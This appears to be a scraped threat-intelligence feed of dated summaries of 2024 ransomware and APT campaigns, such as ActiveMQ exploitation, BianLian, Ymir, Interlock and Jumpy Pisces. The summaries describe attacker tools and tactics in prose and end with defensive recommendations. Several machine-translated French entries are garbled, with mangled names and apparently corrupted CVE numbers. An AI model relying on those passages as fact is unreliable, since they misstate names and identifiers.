bot to exfiltrate data and establish persistence. 1. [Phishing Malware Impersonating the National Tax Service (NTS)](https://sip.security.microsoft.com/intel-explorer/articles/6542e5a4): AhnLab has observed a significant increase in phishing emails impersonating the National Tax Service (NTS), particularly during tax filing periods. These phishing attempts involve emails with manipulated sender addresses to appear as if they are from the NTS, and they contain malicious attachments in various formats or hyperlinks leading to malware-hosting websites and the ultimate deployment of XWorm malware. 1. [Solana Web3.js library backdoored to steal secret, private keys](https://sip.security.microsoft.com/intel-explorer/articles/04dd6cf6): Socket security firm reported that versions 1.95.6 and 1.95.7 of the Solana Web3.js library contained code designed to exfiltrate private and secret keys, which could allow attackers to drain funds from wallets. The attack is believed to be the result of a social engineering/phishing attack targeting maintainers of the official Web3.js open-source library maintained by Solana. 1. [Exploitation of CVE-2023-46604 in Korea](https://sip.security.microsoft.com/intel-explorer/articles/ccb7bd15): AhnLab identified active exploitation of Apache ActiveMQ vulnerability CVE-2023-46604, enabling remote code execution on unpatched Korean systems. Threat actors, including Andariel and Mauri ransomware groups, used tools like Quasar RAT and AnyDesk to exfiltrate data and control compromised environments. 1. [China-Linked Espionage on U.S.-China Organization](https://sip.security.microsoft.com/intel-explorer/articles/9c09d15e): Symantec reported a four-month-long intrusion by suspected Chinese threat actors targeting a U.S. organization with a Chinese presence. The attackers used DLL sideloading, Impacket, and credential-dumping tactics to exfiltrate data, leveraging tools like FileZilla and PSCP for intelligence gathering. 1. [Earth Minotaur\'s MOONSHINE Campaign](https://sip.security.microsoft.com/intel-explorer/articles/699406a4): Trend Micro detailed Earth Minotaur\'s use of the MOONSHINE exploit kit to target vulnerabilities in Android apps like WeChat, delivering the DarkNimbus backdoor. The campaign, likely linked to Chinese actors, focuses on Uyghur and Tibetan communities, employing phishing and Chromium browser exploits to monitor devices. 1. [Vulnerabilities in RAG Systems](https://sip.security.microsoft.com/intel-explorer/articles/53083f3e): Trend Micro exposed critical vulnerabilities in Retrieval-Augmented Generation (RAG) systems, including vector stores and LLM hosting platforms like l | Ransomware Malware Tool Vulnerability Threat Mobile Industrial Prediction | APT 45 | ★★★ |
|
2024-12-06 16:17:50 | Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604) (lien direct) | ## Snapshot Researchers at AhnLab Security intelligence Response Center (ASEC) have identified that the [CVE-2023-46604](https://security.microsoft.com/intel-profiles/CVE-2023-46604) vulnerability in Apache ActiveMQ servers is being exploited on Korean systems. This vulnerability allows remote code execution by manipulating serialized class types in the OpenWire protocol. ## Description The vulnerability began to be actively exploited soon after its disclosure, with incidents linked to the Andariel group and [HelloKitty](https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/) ransomware. The targeting of unpatched systems has been continuous, with attackers deploying tools such as Ladon, Netcat, AnyDesk, and z0Miner to compromise environments. Recently, ASEC has observed evidence that Mauri ransomware threat actors are exploiting CVE-2023-46604, using Quasar RAT as part of the attack chain to exfiltrate information and gain control over systems through remote desktop. While no Mauri ransomware attacks have been confirmed, ASEC notes that Mauri ransomware has been uploaded to the download server. ## Microsoft Analysis and Additional OSINT Context Microsoft Threat Intelligence has identified threat activity exploiting CVE-2023-46604 to facilitate HelloKitty ransomware attacks. The threat actor exploited CVE-2023-46604 to deliver and launch malicious MSI binaries using misexec.exe. The actor then tampered with system services and launched the ransomware. Microsoft has also observed indicators of additional activity targeting ActiveMQ since late October 2023, though the exploitation method was not confirmed. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Due to active attacks in the wild and the availability of exploitation details, organizations should upgrade affected servers immediately. According to Apache, upgrade ActiveMQ servers to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to address this issue. - Review logs and alerts for any indications of exploitation or post-compromise activity on affected servers, such as malicious files dropped and executed via the msiexec.exe command. Upgrading ActiveMQ will not remediate any attacker artifacts. - If evidence of exploitation is discovered, reset the credentials for accounts that have been used on the server, or have logged onto the server. Any service accounts related to ActiveMQ should also have their credentials rotated. - Harden servers by following Apache\'s [ActiveMQ security recommendations](https://activemq.apache.org/security). Enabling authentication for brokers can prevent an attacker from moving laterally to another broker without proper authentication. - Refer to our threat overview on [human-operated ransomwar](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport?ocid=magicti_ta_ta2)e for recommendations on security hardening and monitoring to defend against ransomware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Run Endpoint Detection and Response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-b | Ransomware Tool Vulnerability Threat | APT 45 | ★★ |
|
2024-11-27 20:21:51 | CISA says BianLian Ransomware Now Focuses Only on Data Theft (lien direct) | ## Snapshot The BianLian ransomware operation, initially known for its double-extortion model involving encryption and data exfiltration, has now transitioned to focusing primarily on data theft extortion. ## Description This shift was highlighted in an updated advisory from the U.S. Cybersecurity & Infrastructure Security Agency (CISA), the FBI, and the Australian Cyber Security Centre. The advisory notes that BianLian has moved away from file encryption, particularly after a decryptor was released by Avast in January 2023, and has been exclusively practicing exfiltration-based extortion since January 2024. BianLian\'s updated tactics include targeting Windows and ESXi infrastructure, potentially using the ProxyShell exploit chain for initial access, and exploiting CVE-2022-37969 to escalate privileges on Windows 10 and 11. The group uses Ngrok and modified Rsocks to create SOCKS5 tunnels to mask traffic destinations, employs UPX packing to evade detection, and renames binaries and tasks to mimic legitimate Windows services. Additionally, they create Domain Admin and Azure AD Accounts, perform network login connections via SMB, install webshells on Exchange servers, and use PowerShell scripts to compress data before exfiltration. The group has also introduced a new Tox ID for victim communication and prints ransom notes on printers connected to compromised networks, even calling employees to pressure them. Active since 2022, BianLian has listed 154 victims on its extortion portal and has been involved in notable breaches, including those against Air Canada, Northern Minerals, and the Boston Children\'s Health Physicians. The group has also claimed breaches against several other organizations, although these have not been confirmed. Despite their Russian origin, BianLian attempts to obscure their location by using foreign-language names. ## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. Apply new security patches as soon as possible. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used by Onyx Sleet: - [Block executab | Ransomware Tool Threat | APT 45 | ★★ |
|
2024-11-22 21:45:45 | Helldown Ransomware: An Overview of this Emerging Threat (lien direct) | ## Snapshot Researchers at Sekoia have reported with medium confidence that the \'Helldown\' ransomware operation is exploiting vulnerabilities in Zyxel firewalls to infiltrate corporate networks. ## Description Helldown, which was first documented in August 2024, has been growing rapidly, listing numerous victims on its data extortion portal. The ransomware has a Linux variant that targets VMware files, with capabilities to list and kill VMs to encrypt images, though it appears to be under development. Helldown for Windows is believed to be based on the leaked LockBit 3 builder and shows operational similarities to Darkrace and Donex, but no definitive connection has been established. Helldown is not particularly selective in the data it steals, publishing large data packs on its website, with one instance reaching up to 431GB. The ransomware uses a random victim string as the extension for encrypted files and includes this string in the ransom note\'s filename. Sekoia\'s investigation suggests that Helldown may be using CVE-2024-42057, a command injection vulnerability in Zyxel firewalls\' IPSec VPN, to execute OS commands and establish a foothold in networks. The attackers reportedly use a malicious account to access domain controllers, move laterally, and disable endpoint defenses. Payloads connected to the Zyxel compromise were uploaded to VirusTotal from Russia, indicating the possibility of private n-day exploit usage. As of the latest reports, 31 victims have been listed on Helldown\'s extortion portal, primarily small and medium-sized firms in the United States and Europe. ## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. Apply new security patches as soon as possible. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used by Onyx Sleet: - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-a | Ransomware Malware Tool Vulnerability Threat | APT 45 | ★★ |
|
2024-11-18 12:22:31 | Weekly OSINT Highlights, 18 November 2024 (lien direct) | ## Snapshot Last week\'s OSINT reporting highlights a diverse array of cyber threats, including ransomware, phishing, espionage, and supply chain attacks. Key trends include evolving attack vectors like malicious .LNK files and PowerShell-based lateral movements, as seen in campaigns targeting Pakistan and other regions. Threat actors span from state-sponsored groups such as North Korea\'s Lazarus and China\'s TAG-112 to financially motivated groups like SilkSpecter, with targets including critical sectors like manufacturing, government, healthcare, and e-commerce. Information stealers emerged as a notable theme, with malware such as RustyStealer, Fickle Stealer, and PXA Stealer employing advanced obfuscation and multi-vector attacks to exfiltrate sensitive data from diverse sectors. The reports underscore sophisticated evasion tactics, the leveraging of legitimate platforms for malware delivery, and the persistent targeting of vulnerable backup and storage systems. ## Description 1. [Ymir Ransomware Attack](https://sip.security.microsoft.com/intel-explorer/articles/1444d044): Researchers at Kaspersky identified Ymir, a ransomware variant that performs operations entirely in memory and encrypts data using the ChaCha20 algorithm. Attackers used PowerShell-based lateral movement and reconnaissance tools, employing RustyStealer malware to gain initial access and steal data, targeting systems in Colombia among other regions. 1. [WIRTE Group Cyber Attacks](https://sip.security.microsoft.com/intel-explorer/articles/17c5101d): Check Point Research linked WIRTE, a Hamas-connected group, to espionage and disruptive cyber attacks in 2024, including PDF lure-driven Havoc framework deployments and SameCoin wiper campaigns targeting Israeli institutions. WIRTE, historically aligned with the Molerats, focuses on politically motivated attacks in the Middle East, showcasing ties to Gaza-based cyber activities. 1. [DoNot Group Targets Pakistani Manufacturing](https://sip.security.microsoft.com/intel-explorer/articles/25ee972c): The DoNot group launched a campaign against Pakistan\'s manufacturing sector, focusing on maritime and defense industries, using malicious .LNK files disguised as RTF documents to deliver stager malware via PowerShell. The campaign features advanced persistence mechanisms, updated AES encryption for C&C communications, and dynamic domain generation, highlighting their evolving evasion tactics. 1. [Election System Honeypot Findings](https://sip.security.microsoft.com/intel-explorer/articles/1a1b4eb7): Trustwave SpiderLabs\' honeypot for U.S. election infrastructure recorded attacks like brute force, SQL injection, and CVE exploits by botnets including Mirai and Hajime. The attacks, largely driven by exploit frameworks and dark web collaboration, underline persistent threats against election systems. 1. [Chinese TAG-112 Tibetan Espionage](https://sip.security.microsoft.com/intel-explorer/articles/11ae4e70): In May 2024, TAG-112, suspected to be Chinese state-sponsored, compromised Tibetan community websites via Joomla vulnerabilities to deliver Cobalt Strike payloads disguised as security certificates. The campaign reflects Chinese intelligence\'s enduring interest in monitoring and disrupting Tibetan and other minority organizations. 1. [Phishing Campaigns Exploit Ukrainian Entities](https://sip.security.microsoft.com/intel-explorer/articles/95253614a): Russian-linked threat actor UAC-0194 targeted Ukrainian entities with phishing campaigns, exploiting CVE-2023-320462 and CVE-2023-360251 through malicious hyperlinks in emails. The attacks leveraged compromised municipal servers to host malware and facilitate privilege escalation and security bypasses. 1. [Lazarus Group\'s MacOS Targeting](https://sip.security.microsoft.com/intel-explorer/articles/7c6b391d): Lazarus, a North Korean threat actor, deployed RustyAttr malware targeting macOS via malicious apps using Tauri framework, hiding payloads in Extended Attributes (EA). This campaign reflects evolvin | Ransomware Malware Tool Vulnerability Threat Prediction Medical Cloud Technical | APT 41 APT 38 | ★★★ |
|
2024-11-13 22:39:34 | Toolkit Vastly Expands APT41\\'s Surveillance Powers (lien direct) | The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.
The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia. |
APT 41 | ★★ | |
|
2024-11-13 20:50:44 | Ymir: New Stealthy Ransomware in the Wild (lien direct) | ## Snapshot Researchers at Kaspersky have identified a new ransomware family named "Ymir," which evades detection by performing operations in memory and uses the ChaCha20 algorithm for file encryption. ## Description The attackers initially gained access through PowerShell remote control commands, installed reconnaissance tools like Process Hacker and Advanced IP Scanner, and reduced system security before executing Ymir. The ransomware generates a ransom note in PDF format in every directory, falsely claiming data theft, although it lacks network capabilities. Instead, data theft is suggested to occur through other means, as indicated by the presence of a separate threat, RustyStealer, which allows attackers to control machines and gather information. In a related incident in Colombia, attackers compromised a domain controller using credentials obtained by RustyStealer, moved laterally within the network using WinRM and PowerShell, and executed scripts associated with the proxy malware SystemBC. These scripts established covert channels to C2 servers for data exfiltration. The initial RustyStealer sample was a PE file named "AudioDriver2.0.exe" and connected to a C2 server active since August 2024. Ymir\'s deployment was followed by efforts to cover tracks, including searching for PowerShell to delete itself after execution. The Ymir ransomware is currently undecryptable, and no dedicated leak site has been presented by the attackers. The analysis revealed a link between malware stealer botnets acting as access brokers and ransomware execution, with TTPs for both Ymir and RustyStealer provided, including file and directory discovery, system information discovery, PowerShell scripting, data encryption for impact, and evasion techniques. ## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. Apply new security patches as soon as possible. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used by Onyx Sleet: - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://learn.microsoft.co | Ransomware Malware Tool Threat | APT 45 | ★★ |
 |
2024-11-12 09:01:00 | LightSpy: APT41 Deploys Advanced DeepData Framework In Targeted Southern Asia Espionage Campaign (lien direct) | The threat actor behind LightSpy has expanded their toolset with the introduction of DeepData, a modular Windows-based surveillance framework that significantly broadens their espionage capabilities.
The threat actor behind LightSpy has expanded their toolset with the introduction of DeepData, a modular Windows-based surveillance framework that significantly broadens their espionage capabilities. |
Threat | APT 41 | ★★★ |
|
2024-11-11 18:57:29 | Déballage de l\\\\\\\\\\'attaque de ransomware de verrouillage de verrouillage (lien direct) | ## Instantané La réponse aux incidents de Cisco Talos a observé le groupe de ransomwares de verrouillage se livrant à des attaques de chasse au grand jeu et à une double extorsion, ciblant des secteurs tels que les soins de santé, la technologie, le gouvernement aux États-Unis et la fabrication en Europe depuis son émergence en septembre 2024. ## Description Le groupe emploie une chaîne de livraison multi-composants, lançant son attaque via un site Web légitime compromis qui incite les victimes à télécharger un faux parcours de mise à jour du navigateur. Cet exécutable est un outil d'accès à distance (RAT) qui établit la persistance, collecte les informations système et communique avec un serveur de commande et de contrôle (C2). Les attaquants utilisent également un voleur d'identification, Keylogger et des outils comme AnyDesk, Putty et Azure Storage Explorer pour le mouvement latéral et l'exfiltration des données. Le ransomware de verrouillage, qui a à la fois des variantes Windows et Linux, chiffre les fichiers et ajoute l'extension «.Interlock», tout en évitant le chiffrement de certains dossiers système et extensions de fichiers. La variante Windows utilise un cryptage de chaînage de blocs de chiffre d'affaires (CBC) et la variante Linux utilise le cryptage CBC ou RSA. Le ransomware établit la persistance en créant une tâche quotidienne et peut se supprimer après le cryptage. Une note de rançon est configurée pour s'afficher pendant la connexion interactive à l'aide d'objets de stratégie de groupe, exigeant une réponse dans les 96 heures pour éviter les fuites de données et la notification médiatique. Talos IR note que les ransomwares de verrouillage peuvent avoir des connexions avec les opérateurs ou développeurs de ransomwares Rhysida, suggérés par des similitudes de tactique, de techniques et de procédures (TTPS), ainsi que les comportements des binaires des encryptateurs de ransomware. Les deux groupes utilisent Azcopy pour l'exfiltration des données et fournissent des notes de rançon qui offrent de l'aide plutôt que des menaces, indiquant une tendance de diversification et de collaboration entre les groupes de ransomwares. ## Recommandations Microsoft recommande les atténuations suivantes pour se défendre contre cette menace: - Gardez le logiciel à jour. Appliquez de nouveaux correctifs de sécurité dès que possible. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc) dans Microsoft Defender Antivirus, ou l'équivalent de votre produit antivirus, pour couvrir Évolution rapide des outils et techniques d'attaquant. Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - Activer [Protection réseau] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) . - Exécutez la détection et la réponse des points de terminaison [(EDR) en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-lock-mode?ocid=Magicti_Ta_LearnDoc) pour que Microsoft Le défenseur du point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou Lorsque Microsoft Defender Antivirus fonctionne en mode passif. EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Configurer [Investigation and remédiation] (https://learn.microsoff Sur les alertes pour résoudre les violations, réduisant considérablement le volume d'alerte. - Lisez notre [Ransomware Menace Présentation] (https://security.microsoft.com/Thereatanalytics3/05658B6C-DC62-496D-AD3C-C6A795A33C27/analyStreport) pour le développement d'une posture de sécurité holistique pour éviter Ransomware, y compris l'hygiène de | Ransomware Malware Tool Threat Prediction Medical Cloud | APT 45 | ★★★ |
|
2024-11-04 12:25:16 | Faits saillants hebdomadaires d'osint, 4 novembre 2024 Weekly OSINT Highlights, 4 November 2024 (lien direct) |
## Instantané La semaine dernière, les rapports OSINT de \\ ont mis en évidence l'activité de menace parrainée par l'État et la menace cybercriminale, avec divers vecteurs d'attaque et cibles dans les secteurs.Des acteurs apt en Corée du Nord, en Chine et en Russie ont mené des campagnes ciblées de phishing, de réseau et de campagnes de logiciels malveillants.Les groupes nord-coréens et russes ont favorisé les tactiques de vol d'identification et de ransomwares ciblant les secteurs du gouvernement aux militaires, tandis que les acteurs chinois ont exploité les vulnérabilités de pare-feu pour obtenir un accès à long terme dans les secteurs à enjeux élevés.Pendant ce temps, les cybercriminels ont mis à profit l'ingénierie sociale, le Vishing et l'IoT et les vulnérabilités de plugin pour infiltrer les environnements cloud, les appareils IoT et les systèmes Android.L'accent mis sur l'exploitation des vulnérabilités de logiciels populaires et des plateformes Web souligne l'adaptabilité de ces acteurs de menace à mesure qu'ils étendent leur portée d'attaque, en particulier dans l'utilisation des stratégies de cloud, de virtualisation et de cryptomiminage dans une gamme d'industries. ## Description 1. [Jumpy Poisses Ransomware Collaboration] (https://sip.security.microsoft.com/intel-explorer/articles/393b61a9): l'unité 42 a rapporté la Corée du Nord \'s Jucky Pisse (Onyx Sleet) en partenariat avec Play Ransomware in \'s Jumpy Pisses (ONYX Sleet) en partenariat avec Play Ransomware dans Play Ransomware in Jumpy Pisses (ONYX Sleet)Une attaque à motivation financière ciblant les organisations non spécifiées.L'acteur de menace a utilisé des outils comme Sliver, Dtrack et Psexec pour gagner de la persistance et dégénérerPrivilèges, se terminant par le déploiement des ransomwares de jeu. 1. [Menaces chinoises ciblant les pare-feu] (https://sip.security.microsoft.com/intel-Explorateur / articles / 798C0FDB): Sophos X-OPS a identifié des groupes basés en Chine comme Volt Typhoon, APT31 et APT41 exploitant des pare-feu pour accéderPacifique.Ces groupes utilisent des techniques sophistiquées telles que les rootkits de vie et multiplateforme. 1. [Campagne de phishing sur la plate-forme Naver] (https://sip.security.microsoft.com/intel-explorer/articles/dfee0ab5): les acteurs liés au nord-coréen ont lancé une campagne de phishing ciblant la Corée du Sud \'s Naver, tentantPour voler des informations d'identification de connexion via plusieurs domaines de phishing.L'infrastructure, avec les modifications du certificat SSL et les capacités de suivi, s'aligne sur Kimsuky (Emerald Sleet), connu pour ses tactiques de vol d'identification. 1. [FAKECALL Vishing malware sur Android] (https://sip.security.microsoft.com/intel-explorer/articles/d94c18b0): les chercheurs de Zimperium ont identifié des techniques de vitesses de malware FAKECALT pour voler les utilisateurs de l'Android.Le malware intercepte les appels et imite le numéroteur d'Android \\, permettant aux attaquants de tromper les utilisateurs pour divulguer des informations sensibles. 1. [Facebook Business Phishing Campaign] (https://sip.security.microsoft.com/intel-explorer/articles/82b49ffd): Cisco Talos a détecté une attaque de phishing ciblant les comptes commerciaux Facebook à Taiwan, en utilisant des avis juridiques comme leurre.Lummac2 et les logiciels malveillants de volée des informations de Rhadamanthys ont été intégrés dans des fichiers RAR, collectionner des informations d'identification du système et éluder la détection par l'obscurcissement et l'injection de processus. 1. [Vulnérabilité des caches litres de LiteSpeed] (https://sip.security.microsoft.com/intel-explorer/articles/a85b69db): le défaut du plugin de cache LiteSpeets (CVE-2024-50550) pourrait permettre une escalale de privilège à un niveau de privilège à plus de six millions pour plus de six millionssites.Les vulnérabilités exploitées ont permis aux attaquants de télécharger des plugins ma | Ransomware Malware Tool Vulnerability Threat Mobile Prediction Medical Cloud Technical | APT 41 APT 28 APT 31 Guam | ★★★ |
|
2024-10-31 20:29:50 | Pacific Rim Timeline: Informations pour les défenseurs contre une tresse de campagnes d'attaque entrelacées Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns (lien direct) |
## Instantané Depuis plus de cinq ans, Sophos a suivi plusieurs groupes basés en Chine ciblant leurs pare-feu grâce à des botnets sophistiqués, des exploits uniques et des logiciels malveillants personnalisés. ## Description La collaboration avec divers fournisseurs de cybersécurité, les agences gouvernementales et les forces de l'ordre a permis aux Sophos d'attribuer des activités spécifiques à des groupes comme [Volt Typhoon] (https: // Security.Microsoft.com/intel-profiles/8fe93ebfb3a03fb94a92ac80847790f1d6cfa08f57b2bcebfad328a5c3e762cb), APT31 (suivi par Microsoft comme [Violet.Micoft 8039ED98462546859F2AC987E7EC77A6C7DA15D760E7AC0AAF173AC486)), et APT41 (suivi par Microsoft comme [Typhoon en laiton] (https://security.microsoft.com/intel-profiles/f0aaa62bfbaf3739bb92106688e6a00fc05afc0d4158b0e389b4078112d37c6)).Enquêtes récentesPar Sophos X-OPS a révélé que le développement d'exploitation de confiance élevée se produisait à Sichuan, où ces exploits seraient partagés entre des groupes parrainés par l'État avec des objectifs et des capacités variables. L'analyse met également en évidence l'exploitation de vulnérabilités spécifiques, notamment [CVE-2020-12271] (https://security.microsoft.com/intel-Explorer / CVE / CVE-2020-12271 /), [CVE-2020-15069] (https://security.microsoft.com/intel-explorer/cves/cve-2020-15069/), [CVE-2020-29574] (https://security.microsoft.com/intel-explorer/cves/cve-2020-29574/), [CVE-2022-1040] (https://secuth-2022-3236 /). Sophos a noté un changement significatif dans les comportements des attaquants, passant de larges attaques bruyantes destinées à établir des boîtes de relais opérationnelles (ORB) à des opérations plus ciblées et furtives ciblant les infrastructures de grande valeur, en particulier dans la région indo-pacifique.Les victimes comprennent des organisations dans les secteurs nucléaire, militaire, télécom et gouvernemental.Les tactiques employées par ces adversaires reflètent une amélioration de la furtivité et de la persistance, notamment l'utilisation de techniques de vie, de classes Java en arrière, de chevaux de Troie uniquement et d'un rootkit complexe nommé Cloud Snooper, qui est remarquable pour ses capacités multiplategiennes. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécutez [EDR en mode bloc] (https: // apprendre.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learnDoc) de sorte que Microsoft Defender pour le point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou lorsque Microsoft Defender Antivirus fonctionne en mode passif.EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Autoriser [Investigation and Remediation] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) en mode automatisé complet pour permettre à Microsoft DefenderPour que le point final prenne des mesures immédiates sur les alertes pour résoudre les violations, réduisant considérablement le volume d'alerte. - [Activé] (https://learn.microsoft.com/en-us/defender-endpoint/enable-ctrelled-folders) Accès aux dossiers contrôlés. - Assurez-vous que [Protection de stimulation] (https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-O | Malware Tool Vulnerability Threat Legislation Cloud | APT 41 APT 31 | ★★★ |
|
2024-10-31 19:07:37 | Les Poissons Jumpy s'engagent dans des ransomwares de jeu Jumpy Pisces Engages in Play Ransomware (lien direct) |
## Snapshot Unit 42 has identified the North Korean state-sponsored threat group Jumpy Pisces, also known as Andariel and Onyx Sleet, engaging in a recent ransomware incident through a potential collaboration with the Play ransomware group. ## Description Historically known for cyberespionage, financial crime, and ransomware attacks, Jumpy Pisces (Which Microsoft tracks as [Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)) gained initial access to a victim\'s network in early September 2024 through a compromised user account. They maintained persistence and moved laterally using the open-source tool Sliver, their custom malware DTrack, and other tools such as a customized version of Mimikatz for credential dumping, a tool for creating privileged user accounts with RDP enabled, and a trojanized binary for stealing browser data. These tools communicated with a command-and-control server until the deployment of [Play Ransomware](https://security.microsoft.com/intel-profiles/5052c3d91b03a0996238bf01061afdd101c04f1afb7aeda1fc385a19b4f1b68e). During the period from May to September 2024, the attackers executed various activities, including credential harvesting and privilege escalation, and notably uninstalled endpoint detection and response (EDR) sensors before deploying the ransomware. The use of additional tools like TokenPlayer for Windows access token abuse and PsExec was also observed. The nature of Jumpy Pisces ([Onyx 